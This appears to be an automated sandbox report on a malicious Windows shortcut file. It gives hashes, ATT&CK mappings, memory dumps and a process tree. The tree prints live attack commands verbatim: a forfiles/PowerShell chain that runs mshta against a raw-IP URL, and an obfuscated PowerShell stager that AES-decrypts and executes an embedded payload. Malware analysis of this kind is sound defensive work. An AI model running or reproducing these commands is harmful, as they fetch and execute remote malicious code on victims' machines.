65a0a2b57b7a587cabaeee39e03cfe6639c8bfe727eea06062123a84fd1e55e0

General

Target

9117d5485e8365053ebc055eec3a439df927985113bf15f4607daf7bc04c5b7b.lnk
Size

1KB
MD5

285e3fe042f687b463de137779ecb33d
SHA1

8b3aa13104920abc0eef34d720058f9ac120a680
SHA256

9117d5485e8365053ebc055eec3a439df927985113bf15f4607daf7bc04c5b7b
SHA512

9f0aebf5fb225623e8a9f2e7ecf7bed5b5a44b6c78076b1b4551e1e3ed73e8ebc8dbd276c4d07c2aa4b665273c26b3bdffd839252ca82f1e5f6e4b94a69e4e04

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://92.246.138.48/qqeng

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	2960	mshta.exe
6	2952	powershell.exe
7	2952	powershell.exe
9	2952	powershell.exe
10	2952	powershell.exe

Downloads MZ/PE file

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2624	powershell.exe
2952	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2516	2084	cmd.exe	29
PID 2084 wrote to memory of 2516	2084	cmd.exe	29
PID 2084 wrote to memory of 2516	2084	cmd.exe	29
PID 2516 wrote to memory of 2624	2516	forfiles.exe	30
PID 2516 wrote to memory of 2624	2516	forfiles.exe	30
PID 2516 wrote to memory of 2624	2516	forfiles.exe	30
PID 2624 wrote to memory of 2960	2624	powershell.exe	31
PID 2624 wrote to memory of 2960	2624	powershell.exe	31
PID 2624 wrote to memory of 2960	2624	powershell.exe	31
PID 2960 wrote to memory of 2952	2960	mshta.exe	32
PID 2960 wrote to memory of 2952	2960	mshta.exe	32
PID 2960 wrote to memory of 2952	2960	mshta.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\9117d5485e8365053ebc055eec3a439df927985113bf15f4607daf7bc04c5b7b.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://92.246.138.48/qqeng
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    start mshta http://92.246.138.48/qqeng
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" http://92.246.138.48/qqeng
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function OMmgb($ivjUY){return -split ($ivjUY -replace '..', '0x$& ')};$cNoqKl = OMmgb('467742412C6E76D04ACFF57089F1D5A58C066EA20123EE34DEE09851173098617D5EEBED087BC4479CED82C7578387E7FB5E1EBFDCAC90C105BD0ECCE6A6CE5D5260991036554956D860695F00628D882B5D1AA66AA795B4D877F8227FB645D101D9FAD454EAAA713F4C22D42B41EA6DA20EF6DC7712B648EA3EF3FE65C449CCF2AC65F8E23981D350E9755FD693077373644939E5919F224EB842EE1FAF714AD3F018AA6DE6184FCBE222FCB1E9A7ED145955D3FBE586ACC92BF16907B1CB811566E75D0A7D3EE3B899CA4E7C316E04AC42D1A75E90E30060EA7C67D4CF8A2AC854A1D60D21BC20635DCAF3A493C386EB72CA1D5E631B587F29A14259100DE67ACF083844D98A572491545D4E037CEDC9CBFED1B5683FA5832111588DCF715EF2E1D9D59EAE60CAF78D9FD028C079B4D2FA0C04B87749415A7B02B43DB8C4BE22C99C531DB5470AA3D288069F2E525A6D7C9001BAA291AF89D5D9C113C02E71F52DA913D02FA19A7965CA0968F71470D506125B93330E5B7FE3629359B7293CCDEF7A980DA9577FEB2A56CE60DC2484EA7A1DD5B321F604D797A19D6BD7453069F3123BFB95470ABA915920AE40381890A2814C256EBA7EAB4C35B0C8C05FF3353B555CEE50C1BC3101624A22B8250AB59259523E08237F939419E12B8ABA6A79F375950E5FC7C8DB0F64FBA4A0145C4A4294D5215D8BE2CEE452203A53CBFF8595DB21EB9151F3DF60732E194FEE32F300E14D09454009075F68585D04CA9FBC2E196314C6EC16203E70CFC8F43C36B81282E38DB0B6C34383927D14BDA5E6ACEB06F5245D8CC46292C0653142BF6B80B269CC9FCBAEC040575C6021E2CD503D000B7B53EB7F56C2ABDBE679931720A55E95A9E005703393FA3072530F4FF36FEB27DBAAC6CFD5ACCB759C268AAA4905A521AD162F0F3351D5DF02EE209E33501CF24368FFE6CA45BC6060F634A44D97A85E0632BD574D8B98E41EE4061B8816FE1CDC3076DAE7D22EB0BB56F6A4D856C7CB9BC1BD140E5C14CBC5E291F475F43CFD725A2A93F84BD8869F8B10F4A74263DC73E3448F0B4DB51746511F6B8317EE38BB921B1CF361D874D630FC91B490100ABF04FA3578203F55233DC33D1D34710A7C6A4F0F85E4402C458BEC39DA969A3EB3001874713E4A8F40940C60AEC71A10E46184A6EF7EC6AC8A0E10DA71F1DF1A9BFC16A70741883F100446B9C8764807126C8A9869EA9D7E8A60C253442EBAAA6D09C5FF3C3F053B6217224F94AEE7C15AE39CC9D7749E977AD9E4787171C0EA3E480B161A9E7AFA24E794C9DA9AC42F5AC7328B6EDA37E2944EEC6CBD5CB1FAE16F4D21EDE46EDEA099962885FD42533982AA8CCD15A52A70E5F096084EFBC50CAAA6B87DBEBCB75FD683AF640F3818D34446EF8A1CDC8934E2834FF5BCE72A80A8545A8EC44EA042375E1EA55A894A60C1BB64FB4210FFAAA7687F955BDA7760DE2FFC7E57D6D2571F34E23940B4F792283B6FA3DA80F914E63F7DAD892775A7FB6D519FF01616E8ED666CA6029108330CCBCB5964FE37E0A56DCF2E479802612E8C2E5320051C200960F85BBF35A6D819B408FA8DAEC6542FCB50DE237F134BBABE87DF9FDE11FD006C6543A5D9A8B42AA257CB2F543C109614B3334F2481B877B2679DDDB3D3BF9A18DD12F2A2078FA9CB914CFE42BB2CC48D5E168FAC48990366F4316CA2DE93BA1B7322');$nofnS = [System.Security.Cryptography.Aes]::Create();$nofnS.Key = OMmgb('6E494F4472636653556E7A4B4D784E67');$nofnS.IV = New-Object byte[] 16;$iNQuNuvt = $nofnS.CreateDecryptor();$qzuHTnZFP = $iNQuNuvt.TransformFinalBlock($cNoqKl, 0, $cNoqKl.Length);$hhtCepXuN = [System.Text.Encoding]::Utf8.GetString($qzuHTnZFP);$iNQuNuvt.Dispose();& $hhtCepXuN.Substring(0,3) $hhtCepXuN.Substring(3)
        5⤵
        Blocklisted process makes network request
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M85T3IB82RAWQUCKD88T.temp

Filesize
7KB

MD5
18bb4385339c91088f963d91a3b3333d

SHA1
d6110d2fd06d243f3608b4c67cc8bbd113ac5ce7

SHA256
5a08a23b26ae6c9595727402e869637f6b3d502942827ceb29c70917639e2ea3

SHA512
ae40967b25e1396553d1b578285869519d185a07565d74eebaa52791815cc49445cffd190f7db1c20858e0b46eabf211230565d5717eb3552e34cda17d6976f7

Download Submit
memory/2624-44-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-42-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-43-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2624-40-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2624-46-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2624-45-0x0000000002934000-0x0000000002937000-memory.dmp

Filesize
12KB

Download
memory/2624-47-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-41-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2952-57-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2952-59-0x0000000002A90000-0x0000000002B10000-memory.dmp

Filesize
512KB

Download
memory/2952-58-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-56-0x0000000002A90000-0x0000000002B10000-memory.dmp

Filesize
512KB

Download
memory/2952-60-0x0000000002A90000-0x0000000002B10000-memory.dmp

Filesize
512KB

Download
memory/2952-55-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-54-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2952-61-0x0000000002A90000-0x0000000002B10000-memory.dmp

Filesize
512KB

Download
memory/2952-62-0x0000000002A90000-0x0000000002B10000-memory.dmp

Filesize
512KB

Download
memory/2952-63-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing